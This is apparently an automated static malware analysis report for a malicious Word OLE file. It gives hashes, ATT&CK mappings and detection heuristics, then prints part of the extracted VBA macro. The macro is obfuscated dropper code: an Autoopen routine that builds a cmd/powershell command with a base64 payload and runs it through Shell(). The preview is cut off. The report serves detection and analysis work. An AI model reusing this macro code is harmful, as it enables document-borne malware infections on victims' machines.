Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 954f8b06741adf87…

MALICIOUS

Office (OLE)

115.2 KB Created: 2018-06-05 16:39:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 27a21ae233b6c9ab6ad3c26ece5a82c6 SHA-1: f1877b0062902f516b8a6481e6c773dfb3c38a53 SHA-256: 954f8b06741adf878fd457e0dd43327dc130948ec4978ecd78492156efcecdaa
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls a function which uses the Shell() command. This function appears to construct and execute a command line that includes obfuscated calls to 'cmd.exe' and 'powershell.exe', likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6574551-0' further supports its role as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6574551-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574551-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11632 bytes
SHA-256: b49cfa345edf5b1a778ee3063c49420956794010bae339153f542741cb1f671a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MJwoFHiLnVur"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iPMVTYcJEm()
On Error Resume Next
iswFF = Hex(OsSiuw + Hex(HvLnSi) * 36585 + Round(Nowhm))
UjjEOR = Cos(oXjcWa)
hZbjo = CDate(wCbWvz)
wUDzX = Cos(rtLlZ)
jzTXiL = Hex(ILcoNN + Hex(KuSFKJ) * 31476 + Round(iTTjFE))
NVoBDI = Cos(dizLzp)
Ujqmi = CDate(zbGbQ)
lVzDz = Cos(rZwGA)
iPMVTYcJEm = CaiFHu + Shell(ciJslwOFfJ + Chr(VjnaH + vbKeyC + ZpGXkXqWqUo) + jVjnET + bIYARHiHzr + lqcEPvYJPkc + FFXqCoazG + DqwVlZNqNJ + aJOBk + izwaoBcqJz, 79505 - 79505)
JkhQn = Hex(wJakJ + Hex(duawll) * 29480 + Round(lnWGd))
zFIQLO = Cos(dctajn)
cGpALM = CDate(DfvnMq)
aVObnN = Cos(tBKZv)
End Function
Sub Autoopen()
On Error Resume Next
zRhVE = Hex(QkfwWu + Hex(AwaNc) * 98004 + Round(sDGfz))
aqjEfa = Cos(EalzZ)
OaCuXr = CDate(WMMSoh)
YPwKCW = Cos(XaAbT)
iPMVTYcJEm
iMaLcn = Hex(kwqIjn + Hex(WNdQP) * 95512 + Round(rpdav))
WqzCT = Cos(vBJmB)
AnpcYo = CDate(ODpKwk)
VvnXw = Cos(hlXuzo)
End Sub


Attribute VB_Name = "fsRMbcaOJKPQp"
Function jVjnET()
On Error Resume Next
jGQHdd = Hex(zTMsEh + Hex(naiKNI) * 59714 + Round(nzwKGb))
WGSHVl = Cos(bHCHQH)
ijvhw = CDate(SWCGwB)
STLTXC = Cos(zGZwMN)
lYzMuhr = "md XbNzEoTPOf" + "r LUSn" + "wfoO" + "ECSJjjsvuw" + "MTb qt" + "aEkuE &    " + " %^c^o^m^S"
zbIFr = Hex(jEQBc + Hex(nhAEM) * 17742 + Round(wTHwj))
OKLcHw = Cos(kmSvu)
GiFND = CDate(qPPQw)
MnsQh = Cos(iYVdNX)
ssdzi = "^p^E^c^%   " + "  %^c^o^m^S^p^" + "E^c^%" + "     /V " + "        /c    " + "   " + "    set %mMzQbQ" + "jisJZPYUJ"
ICHXAO = Hex(JKCpq + Hex(EmsUw) * 87085 + Round(auLcT))
ZQVjc = Cos(iluHi)
PBrsCk = CDate(abosj)
fTJCO = Cos(fDvpoo)
nsINYjFMZ = "%=iYFbTUj&&s" + "et %mPV" + "FNlfpZzDXN%" + "=p&&set %" + "OZhJoNXrM" + "AA%=o" + "^w&&set %iSjScu" + "YaDTzQGLC%=SL" + "RBomD&" + "&s"
ZXIUJi = Hex(cjrWi + Hex(aZtdkY) * 79252 + Round(zwYjfR))
oTMDD = Cos(LjRHi)
WXvcm = CDate(VQFJR)
PzzcZ = Cos(ldNGnP)
KlUTNaItwbz = "et %wBKIlBfjNN" + "%=!%m" + "PVFNlfpZzDXN%" + "!&&set " + "%ChhpvffT" + "kSfSzrw" + "%=k" + "UiWwZE" + "&&set %"
TiVPtb = Hex(GLSHB + Hex(mPJAz) * 59377 + Round(InEYi))
hWAzP = Cos(jzTpAA)
hvwEj = CDate(aDzVUM)
INWfZ = Cos(jmuzFL)
UqsjJKSZ = "iZVZYc" + "ZzXKUjG%=e^r&" + "&set " + "%bHAblMSXJLc" + "%=!%OZhJo" + "NXrMAA%!&&" + "set %YrJm" + "EwiVoT%=s&" + "&set %CsbT" + "nPCS"
jVjnET = lYzMuhr + ssdzi + nsINYjFMZ + KlUTNaItwbz + UqsjJKSZ
End Function
Function bIYARHiHzr()
On Error Resume Next
XUYTZ = Hex(AlwGJ + Hex(YjHDkA) * 63033 + Round(HbTanP))
TZnws = Cos(dUFfdw)
MXLGN = CDate(BQZjJw)
YvwBz = Cos(KFjLIJ)
JjDkHkMt = "srOjlvF" + "%=vYzOzbtF" + "NUH&&" + "set " + "%oPLUvCU" + "FUHFUAb%=he&&s" + "et %" + "wQCEEADUpj" + "i%=ll&&!%wBKIl" + "Bfj"
quMBY = Hex(EVajP + Hex(NrNnu) * 82019 + Round(zUUhYE))
wlFfMD = Cos(wFGEXK)
uCzMj = CDate(kowRmU)
LwVNnz = Cos(ISPvXM)
MOUqi = "NN" + "%!!%bHAblMSXJL" + "c%!!%iZV" + "ZYcZzXKUjG%!!" + "%YrJmEwiV"
RlGiW = Hex(cDRWUr + Hex(wJpns) * 83833 + Round(lzjtQ))
TtbnCp = Cos(aTDpj)
oCIfz = CDate(wiuzcb)
fndRB = Cos(RwLic)
wsKparmQT = "oT%!!%o" + "PLUvCUFU" + "HFUAb%!!%wQC" + "EEADU" + "pji%! " + " -e IAAoAG4ARQ" + "B3AC0AT" + "wBiAEoARQB"
UfXndF = Hex(EcCWd + Hex(kAUrZ) * 88802 + Round(LzKjzB))
bRTdT = Cos(BiNYuQ)
cXacRz = CDate(QMzElo)
TVUqqc = Cos(YmIZC)
bNSizFa = "DAFQAIAAgAE" + "kAbwAuAEMAT" + "wBNAFAAUgBF" + "AFMAUwBp"
SGnvwJ = Hex(WnYhP + Hex(DmPUPr) * 60669 + Round(iJshE))
qDkRDO = Cos(fKZBI)
nGfwnb = CDate(ZRJSth)
ukwuN = Cos(WJTDHd)
ivFzFsOR = "AE8ATgAuAEQ" + "ARQ" + "BmAGwAYQB0AGUA" + "cwB0AHIAZQBBAG0" + "AKABbAHMAWQ"
uYbqT = Hex(PrwCM + Hex(GLOZt) * 35175 + Round(VrIuN))
nQFinc = Cos(JawBpT)
mSfwik = CDate(HjIkZk)
IJmdOL = Cos(qJNJaX)
KHfwu = "BzAFQA" + "RQBNAC4AaQB" + "vAC4ATQBlAG0AT" + "wBSAFkAU" + "wBUAFIARQB" + "hA"
jNNjaT = Hex(DLKMdp + Hex(jztNrG) * 2328 + Round(LXaHT))
IRpHMt = Cos(TvAzRw)
zcRlW = CDate(HLTvjR)
PBp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.